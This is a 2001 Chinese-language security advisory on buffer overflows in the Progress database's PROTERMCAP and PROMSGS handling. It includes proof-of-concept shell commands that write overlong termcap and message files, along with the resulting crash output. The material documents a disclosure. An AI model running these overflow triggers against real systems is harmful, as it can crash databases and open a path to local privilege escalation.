Progress TERM (protermcap) 和PROMSGS缓冲溢出漏洞发布时间:2001-10-10 更新时间:2001-10-10 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 progress versions 8 和 9详细描述 Progress是商业使用的数据库。 超长的字符传提送给环境变量termcaps和promsgs可导致progress数据库崩溃,覆盖内存地址并执行任意代码。 测试代码 [root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term [root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term [root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term [root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term [root@linux dlc]# export PROTERMCAP=./term There are a few ways to set this off... you can make use of a bug in the PROMSGS here is the standard promsgs error for a bad term. PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001 Unable to use your terminal. Check your PROTERMCAP file. (443) ** Could not find terminal type xterm in file ./term. (146) [root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs [root@linux dlc]# export PROMSGS=/tmp/promsgs [root@linux dlc]# bin/pro @@@@@@ @@@@@@ @@@@@@@ @@@@@ @@@@@@ @@@@@@@ @@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@@ @@@@@@ @ @ @ @@@@ @@@@@@ @@@@@ @@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@@@ @@@@@ @ @ @@@@@@@ @@@@@ @@@@@ Progress Software Corporation 14 Oak Park Bedford, Massachusetts 01730 781-280-4000 PROGRESS is a registered trademark of Progress Software Corporation Copyright 1984-2001 by Progress Software Corporation All Rights Reserved PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001 Error formatting messaage 96. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA errno=0 reading promsgs file, it may have been deleted. Unable to format message number 6063 Error formatting messaage 24. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA rrno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. errno=0 reading promsgs file, it may have been deleted. Error formatting messaage 146. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA errno=0 reading promsgs file, it may have been deleted. Unable to format message number 443 Error formatting messaage 49. Message file is corrupt. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA errno=0 reading promsgs file, it may have been deleted. Unable to format message number 439 Quit (core dumped) 和 root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term [root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term [root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term [root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term [root@linux dlc]# export TERM=v7kf [root@linux dlc]# bin/pro @@@@@@ @@@@@@ @@@@@@@ @@@@@ @@@@@@ @@@@@@@ @@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@@ @@@@@@ @ @ @ @@@@ @@@@@@ @@@@@ @@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@@@ @@@@@ @ @ @@@@@@@ @@@@@ @@@@@ Progress Software Corporation 14 Oak Park Bedford, Massachusetts 01730 781-280-4000 PROGRESS is a registered trademark of Progress Software Corporation Copyright 1984-2001 by Progress Software Corporation All Rights Reserved PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001 SYSTEM ERROR: strent request for more than 32K. (893) Quit (core dumped) 解决方案 尚无 相关信息 KF (dotslash@snosoft.com) |
